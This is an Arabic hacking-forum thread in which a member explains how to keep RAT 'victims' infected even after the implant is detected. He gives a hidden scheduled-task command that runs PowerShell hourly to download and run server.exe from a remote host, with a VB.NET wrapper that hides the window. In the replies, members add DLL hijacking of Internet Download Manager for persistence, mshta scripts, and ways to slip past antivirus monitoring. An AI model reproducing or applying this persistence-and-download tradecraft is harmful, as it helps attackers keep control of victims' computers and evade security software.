[ طريقة ] طريقتي في المحافظة على الضحايا

تم تحميل الصفحة في 1,3421374 ثانية
طريقتي في المحافظة على الضحايا
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
8 سبتمبر 2013
المشاركات
7,867
الإعجابات
11,747
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
السلام عليكم
سوف اشرح لكم احدى طرقي الخاصة لتثبيت الضحايا حتى لو انكشف السيرفر
و اتمنى ان تستفدوا منها

المميزات :
- لن تنكشف ابداً من جهة الحمايات
- اكثر من طريقة للاستخدام (سأشرح واحدة)​

قبل كل شي :

قبل كل شيء تذكر ان الطريقة لمحافظة على الضحايا و ليس لتثبيت السيرفر
يعني الطريقة بدون تثبيت لنفسها
لذلك تحتاج الى طريقة تشغيل
اما من خلال Reg او من خلال SchTask أو أي طريقة غير شائعة تملكها

سوف أستعين بالمهام المجدولة كونها المفضلة بالنسبة لي عن باقي الطرق التي اعرفها
و أيضاً هي مشهورة في الديف في حال واجهت مشكلة تستطيع السؤال و الحصول على الجواب

سأستخدم عنصرين هنا و هما : - الباورشل - المهام المجدولة

العمل :

نفتح محرر النصوص حتى نرتب الكود بدون مشاكل

كود C#
// كود المهام المجدولة
schtasks /create /sc minute /mo 60 /tn IDMAN /tr  XXX


كود C#
// كود الباور شل
"$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');"


الآن نذهب الى التلغيمة
نلصق كود المهام و نحتاج تثبيت للسيرفر .. لماذا ؟
- الاول من اجل الكود الباورشل
- الثاني من اجل السيرفر فهو لن يشغل نفسة بعد النزول ..
نصل الى الشيء الأخير و هو شكل الكود بعد الانتهاء
مثال vb.net :

كود Visual Basic
shell ( " schtasks /create /sc minute /mo 60 /tn IDMAN /tr " & char(34) & "$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');" & char(34) , AppStyle.Hide)



هذه الطريقة كنت استخدمها سابقاً و تعمل بكفاءة على كل الانظمة الى غاية ان تركت الهاك
لذلك اتمنى انكم تحسنون استخدامها
- ملاحظة مهمة الكود كتبتة من راسي لذلك اتمنى اخباري في حال وجود اي اخطاء في الكتابة

و إذا كان هنالك اي سؤال او أستفسار
لا تترددوا ..

اخوكم امير ,,
 
إنضم
5 أبريل 2013
المشاركات
598
الإعجابات
1,323
النقاط
93
و عليكم السلام و رحمة الله و بركاته

فعلاً الطريقة جميلة و هُناك طُرق أخرى عن طريق mshta with js & vbs code

و التسجيل بالريجستري أو مثل ما تفضلت بجدولة المهام

v_B01
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,570
النقاط
173
الإقامة
Germany
تفكيرك جميل اخي الحبيب وانا تعلمت قصة الباور شيل من الاخر نابليون
ماشاء الله في جعبتك الكثير دوما
بالنسبة لتثبيت السيرفر ف انا لااقوم بتثبيت السيرفر لا ب رجيستري ولا نسخه عند بدء التشغيل
افضل ان يقوم البرنامج الموثوق بتشغيل السيرفر عند بدء التشغيل
بالاعتماد على دي ال ال هايجاك او شبيهه كان يقوم الانترنت داونلود منجر بتشغيل ملف exe معه دائما
عند كل بدء تشغيل
رايت ان هذه انسب طريقة بعيدا عن الريجيستري ونسخ السيرفر في بدء التشغيل
هذه طريقتي ولليوم اقوم بتلغيم الانترنت داونلود منجر عن طريق الدي ال ال هايجاك او ملف تنفيذي اخر يعمل مع البرنامج الاساسي مثلا هذا IEMonitor.exe
طريقة قديمة جدا وطرحتها من سنين بس للان استخدمها ههه والحمدلله ماشية الامور
ماشاء الله عليكم انتم لاتتوقفون عن التطوير وايجاد طرق اكثر تقدما
 
إنضم
8 سبتمبر 2013
المشاركات
7,867
الإعجابات
11,747
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
اول رددددددددد محجوز
تسلم ايديك يابطل
الفكره جميله جدا
بالتوفيق
حبيبي نورت
و عليكم السلام و رحمة الله و بركاته

فعلاً الطريقة جميلة و هُناك طُرق أخرى عن طريق mshta with js & vbs code

و التسجيل بالريجستري أو مثل ما تفضلت بجدولة المهام

v_B01
من متى احنة نقول كل شي في موضوع واحد يا حلو :3 .. بعد فيه اشياء بنطرحها مستقبلاً من ضمنها الي ذكرتها انت
و شي ما ذكرته يخص المتصفحات و كذا ههههه
يعطيك العافيه امير
فكره جميله نفسك يا جميل هههه
حبيبي يا حمود نورت والله يابو السكرين شوت و الفيديوهات هههه
تفكيرك جميل اخي الحبيب وانا تعلمت قصة الباور شيل من الاخر نابليون
ماشاء الله في جعبتك الكثير دوما
بالنسبة لتثبيت السيرفر ف انا لااقوم بتثبيت السيرفر لا ب رجيستري ولا نسخه عند بدء التشغيل
افضل ان يقوم البرنامج الموثوق بتشغيل السيرفر عند بدء التشغيل
بالاعتماد على دي ال ال هايجاك او شبيهه كان يقوم الانترنت داونلود منجر بتشغيل ملف exe معه دائما
عند كل بدء تشغيل
رايت ان هذه انسب طريقة بعيدا عن الريجيستري ونسخ السيرفر في بدء التشغيل
هذه طريقتي ولليوم اقوم بتلغيم الانترنت داونلود منجر عن طريق الدي ال ال هايجاك او ملف تنفيذي اخر يعمل مع البرنامج الاساسي مثلا هذا IEMonitor.exe
طريقة قديمة جدا وطرحتها من سنين بس للان استخدمها ههه والحمدلله ماشية الامور
ماشاء الله عليكم انتم لاتتوقفون عن التطوير وايجاد طرق اكثر تقدما
حياك الله اخي و يعجبني ان ارى هكذا ردود نافعة تزيدني من العلم
بالفعل افضل طرق التثبيت هي الاعتماد على الموثوق
و خاصة برنامج IDM فهو مستنقع لثغرات dll hijacking و تجد فيه ثغرات الى الان لم ترقع مثل connect.dll الى فترة بسيطة جربتها و تعمل
بالإضافة الى خدعة اخرى اتمنى منك البحث فيها و هي ان تصنع الثغرة بنفسك و تستغلها
و هذا الاسلوب المفضل لي
بإذن الله لي طريقتين سوف اطرحهما يجعلان السيرفر غير قابل للحذف من الحماية
(تقريباً تقدر تقول بدون مسار لحذفه او قتله)
انرت
 

azerty94

Active DeveloPer
rankrank
إنضم
9 مارس 2011
المشاركات
339
الإعجابات
353
النقاط
63
السلام عليكم
سوف اشرح لكم احدى طرقي الخاصة لتثبيت الضحايا حتى لو انكشف السيرفر
و اتمنى ان تستفدوا منها

المميزات :
- لن تنكشف ابداً من جهة الحمايات
- اكثر من طريقة للاستخدام (سأشرح واحدة)​

قبل كل شي :

قبل كل شيء تذكر ان الطريقة لمحافظة على الضحايا و ليس لتثبيت السيرفر
يعني الطريقة بدون تثبيت لنفسها
لذلك تحتاج الى طريقة تشغيل
اما من خلال Reg او من خلال SchTask أو أي طريقة غير شائعة تملكها

سوف أستعين بالمهام المجدولة كونها المفضلة بالنسبة لي عن باقي الطرق التي اعرفها
و أيضاً هي مشهورة في الديف في حال واجهت مشكلة تستطيع السؤال و الحصول على الجواب

سأستخدم عنصرين هنا و هما : - الباورشل - المهام المجدولة

العمل :

نفتح محرر النصوص حتى نرتب الكود بدون مشاكل

كود C#
// كود المهام المجدولة
schtasks /create /sc minute /mo 60 /tn IDMAN /tr  XXX


كود C#
// كود الباور شل
"$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');"


الآن نذهب الى التلغيمة
نلصق كود المهام و نحتاج تثبيت للسيرفر .. لماذا ؟
- الاول من اجل الكود الباورشل
- الثاني من اجل السيرفر فهو لن يشغل نفسة بعد النزول ..
نصل الى الشيء الأخير و هو شكل الكود بعد الانتهاء
مثال vb.net :

كود Visual Basic
shell ( " schtasks /create /sc minute /mo 60 /tn IDMAN /tr " & char(34) & "$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');" & char(34) , AppStyle.Hide)



هذه الطريقة كنت استخدمها سابقاً و تعمل بكفاءة على كل الانظمة الى غاية ان تركت الهاك
لذلك اتمنى انكم تحسنون استخدامها
- ملاحظة مهمة الكود كتبتة من راسي لذلك اتمنى اخباري في حال وجود اي اخطاء في الكتابة

و إذا كان هنالك اي سؤال او أستفسار
لا تترددوا ..

اخوكم امير ,,
موضوع جميل اخي امير
ينقصه فقط التحقق من عدم وجود الملف << عمليه روتينييه عاديه
واستعمال داله اخرى غير shellexecute اكتر داله مشبوهه ومقنوصه ومرصوده الخ
مبروك الاشراف
 

azerty94

Active DeveloPer
rankrank
إنضم
9 مارس 2011
المشاركات
339
الإعجابات
353
النقاط
63
السلام عليكم
سوف اشرح لكم احدى طرقي الخاصة لتثبيت الضحايا حتى لو انكشف السيرفر
و اتمنى ان تستفدوا منها

المميزات :
- لن تنكشف ابداً من جهة الحمايات
- اكثر من طريقة للاستخدام (سأشرح واحدة)​

قبل كل شي :

قبل كل شيء تذكر ان الطريقة لمحافظة على الضحايا و ليس لتثبيت السيرفر
يعني الطريقة بدون تثبيت لنفسها
لذلك تحتاج الى طريقة تشغيل
اما من خلال Reg او من خلال SchTask أو أي طريقة غير شائعة تملكها

سوف أستعين بالمهام المجدولة كونها المفضلة بالنسبة لي عن باقي الطرق التي اعرفها
و أيضاً هي مشهورة في الديف في حال واجهت مشكلة تستطيع السؤال و الحصول على الجواب

سأستخدم عنصرين هنا و هما : - الباورشل - المهام المجدولة

العمل :

نفتح محرر النصوص حتى نرتب الكود بدون مشاكل

كود C#
// كود المهام المجدولة
schtasks /create /sc minute /mo 60 /tn IDMAN /tr  XXX


كود C#
// كود الباور شل
"$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');"


الآن نذهب الى التلغيمة
نلصق كود المهام و نحتاج تثبيت للسيرفر .. لماذا ؟
- الاول من اجل الكود الباورشل
- الثاني من اجل السيرفر فهو لن يشغل نفسة بعد النزول ..
نصل الى الشيء الأخير و هو شكل الكود بعد الانتهاء
مثال vb.net :

كود Visual Basic
shell ( " schtasks /create /sc minute /mo 60 /tn IDMAN /tr " & char(34) & "$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');" & char(34) , AppStyle.Hide)



هذه الطريقة كنت استخدمها سابقاً و تعمل بكفاءة على كل الانظمة الى غاية ان تركت الهاك
لذلك اتمنى انكم تحسنون استخدامها
- ملاحظة مهمة الكود كتبتة من راسي لذلك اتمنى اخباري في حال وجود اي اخطاء في الكتابة

و إذا كان هنالك اي سؤال او أستفسار
لا تترددوا ..

اخوكم امير ,,
موضوع جميل اخي امير
ينقصه فقط التحقق من عدم وجود الملف << عمليه روتينييه عاديه
واستعمال داله اخرى غير shellexecute اكتر داله مشبوهه ومقنوصه ومرصوده الخ
مبروك الاشراف
 

Mxn0

KEEB CaLM AND GeeK oN
rankrank
إنضم
29 أبريل 2016
المشاركات
362
الإعجابات
257
النقاط
63
جميل جداّ واقول ليش امير مختفي فترة ,يشاور نفسه ينزلها ولا لا:(172)[1]:
 
إنضم
8 سبتمبر 2013
المشاركات
7,867
الإعجابات
11,747
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
يعطيك العافية اخي امير
فكرة جميلة منك واستغلالك للبور شيل
حياك الله اخي محمد و انتم تملكون الاقوى انا واثق اخي
الله يعطيك العافية على الطريقة
بالتوفيق
الله يعافيك حبيبي كيرا
طريقة جميلة جدا بارك الله فيك صديقي انت اسطورة
حياك الله اخي انا فقط اتصفح الانترنت لا اكثر
موضوع جميل اخي امير
ينقصه فقط التحقق من عدم وجود الملف << عمليه روتينييه عاديه
واستعمال داله اخرى غير shellexecute اكتر داله مشبوهه ومقنوصه ومرصوده الخ
مبروك الاشراف
حياك الله اخي ازيرتي
نعم كان في بالي اكتب شرط تحقق لكن خفت ان المهام لا تستحمل عدد كاركتر كبير كما صادفني في وقت سابق
مع ذلك انتظر مني موضوع يوم الجمعة على الاكثر يخص الباورشل تحديداً و بإذن الله شيء من الاشياء التي احتفظ بها لنفسي
لكن ما الحاجة لها فانا لا استخدمها
الكلام سهل هههه لكن لن تصاب بخيبة امل اعدك بذلك
صحيح الكود الي فوق فيه شيء ناقص توقعت ان يلاحظه احد لكن الى الان لم يلاحظه اي شخص خخخخ
الصبح كنت كتبت الموضوع و انا ما نمت من امس و لما انتبهت اني نسيتة تركتة قلت اريد اشوف من يعرفه ينبهني عليه ههههه
انت نبهتني على الشرط و باقي شي اخر انتظر احد ينبهني عليه :3
و اشكرك اخي للتهنئة اقول لك شي لولا انكم غير موجودين ما صار لنا مكان في الاشراف فأنتم اجدر بها
shell ( " schtasks /create /sc minute /mo 60 /tn IDMAN /tr " & char(34) & "$ameer = new-object System.Net.WebClient; $ameer.DownloadFile('http:\\www.dev-point.com\server.exe','YourPath\server.exe');" & char(34) , AppStyle.Hide)

اضع هذا فى ال vb.net

؟ فقط ولا اى شئ اخر ؟!
للأسف اخي فارس تحتاج منك معرفة شوية حتى تستطيع استخدامها بشكل صحيح
انا طرحت مثال حتى يتم فهم الطريقة و ليس نقلها
طريقة جميلة في انتظار المزيد من ابداعاتك :biggrin:
حياك الله و بياك اخي شادو نورت والله
جميل جداّ واقول ليش امير مختفي فترة ,يشاور نفسه ينزلها ولا لا:(172)[1]:
ههههه لا والله من زمان استخدم الفكرة لكن لما تزيد معرفتك تقدر تطبق اي شيء فأي شي
اتمنى ان كلامك غير مجامل و ان الطريقة فعلا جيدة اخي العزيز
 

azerty94

Active DeveloPer
rankrank
إنضم
9 مارس 2011
المشاركات
339
الإعجابات
353
النقاط
63
حياك الله اخي ازيرتي
نعم كان في بالي اكتب شرط تحقق لكن خفت ان المهام لا تستحمل عدد كاركتر كبير كما صادفني في وقت سابق
مع ذلك انتظر مني موضوع يوم الجمعة على الاكثر يخص الباورشل تحديداً و بإذن الله شيء من الاشياء التي احتفظ بها لنفسي
لكن ما الحاجة لها فانا لا استخدمها
الكلام سهل هههه لكن لن تصاب بخيبة امل اعدك بذلك
صحيح الكود الي فوق فيه شيء ناقص توقعت ان يلاحظه احد لكن الى الان لم يلاحظه اي شخص خخخخ
الصبح كنت كتبت الموضوع و انا ما نمت من امس و لما انتبهت اني نسيتة تركتة قلت اريد اشوف من يعرفه ينبهني عليه ههههه
انت نبهتني على الشرط و باقي شي اخر انتظر احد ينبهني عليه :3
و اشكرك اخي للتهنئة اقول لك شي لولا انكم غير موجودين ما صار لنا مكان في الاشراف فأنتم اجدر بها
لا تقل هدا يا رجل مكانك في مرتبه اعلى من هده اخ امير
لم اقراه في المره الاولى لان الفكره واضحه
لكن بعدما قرات الكود بسرعه تبين انه معوق من دوي الحتياجات الخاصه
ولا يستطيع اكمال السباق هه
 
إنضم
8 سبتمبر 2013
المشاركات
7,867
الإعجابات
11,747
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
لا تقل هدا يا رجل مكانك في مرتبه اعلى من هده اخ امير
لم اقراه في المره الاولى لان الفكره واضحه
لكن بعدما قرات الكود بسرعه تبين انه معوق من دوي الحتياجات الخاصه
ولا يستطيع اكمال السباق هه
يمكن كان لازم اسكت و ما انبهك عليه ههههه راح الانبهار منك
 
إنضم
7 سبتمبر 2010
المشاركات
3,297
الإعجابات
1,649
النقاط
113
ليس دى خبرة للأسف :(

اتمنى لو لديك وقت انت تضيف شرج الاستغلال فما بعد
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل